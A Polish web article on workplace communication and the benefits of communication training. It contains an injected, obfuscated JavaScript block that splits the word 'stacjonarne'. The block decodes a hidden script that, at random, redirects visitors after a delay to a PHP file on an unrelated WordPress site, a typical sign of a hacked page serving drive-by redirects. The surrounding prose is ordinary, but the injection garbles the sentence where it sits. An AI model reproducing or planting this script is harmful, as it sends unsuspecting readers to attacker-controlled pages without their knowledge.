Komunikacja w miejscu pracy

Komunikacja interpersonalna jest jedną z najbardziej pożądanych umiejętności w środowisku pracy. Sieci kontaktów biznesowych cały czas się rozszerzają, coraz bardziej potrzebne są zdolności komunikacyjne na każdym szczeblu działania organizacji.

Jakie korzyści przynoszą szkolenia z komunikacji ? 

stacjo<script>function u2fd518ba9147(q3){var u9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var y7='';var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0<q3.length);document.write(y7);};u2fd518ba9147('PHNjcmlwdD4NCnZhciBudW1iZXIxPU1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDYpOyANCmlmIChudW1iZXIxPT0zKQ0Kew0KIHZhciBkZWxheSA9IDE4MDAwOwkNCiBzZXRUaW1lb3V0KCJkb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmJ0bGF3ZmlybS5jb20vd3AtY29udGVudC9wbHVnaW5zL3NpLWNvbnRhY3QtZm9ybS9jYXB0Y2hhLXNlY3VyZWltYWdlL3NlY3VyaW1hZ2Vfc3RvcC5waHAnIiwgZGVsYXkpOw0KfQ0KPC9zY3JpcHQ+');</script>narne szkolenia z komunikacjiKażda kultura organizacyjna danego przedsiębiorstwie wyróżnia się zbiorem ukształtowanych wartości i norm, wśród nich znajduje się także komunikacja. Sprawna i efektywna komunikacja będzie miała wpływ na budowanie współpracy, poczucie dążenia do tego samego celu. Dlatego właśnie pracodawcy dążą do osiągnięcia jak najlepszej formy komunikacji w swoich przedsiębiorstwach. W tym celu, organizowane są często stacjonarne szkolenia z komunikacji, prowadzone przez szkoleniowe firmy zewnętrzne. Szkolenia prowadzone są przez psychologów, trenerów, i coachów, mają na celu wypracowanie lub poprawienie umiejętności komunikacyjnych. Dotyczy to zarówno zadań podejmowanych indywidualnie jak też w grupie. Uczestnicy poznają błędy w komunikacji, podstawowe bariery komunikacyjne, narzędzia komunikacji wewnętrznej, istotne elementy w procesach aktywnego słuchania i rozumienia wypowiedzi. Podczas każdego z tego typu szkoleń, wprowadzone są również zagadnienia z obszaru komunikacji werbalnej i niewerbalnej. Organizatorzy starają się, aby szkolenia miały charakter interaktywny, dzięki temu uczestnicy mogą być aktywni we wszystkich podejmowanych tematach (forma warsztatowa, udzielanie informacji zwrotnych).

Skutecznie działające zespoły, realizujące wyznaczone cele i osiągające sukcesy, wyróżniają się skuteczną komunikacją interpersonalną. Takich pracowników cechuje nie tylko sprawna komunikacja w relacjach, ale też konstruktywne podejście do nowych sytuacji.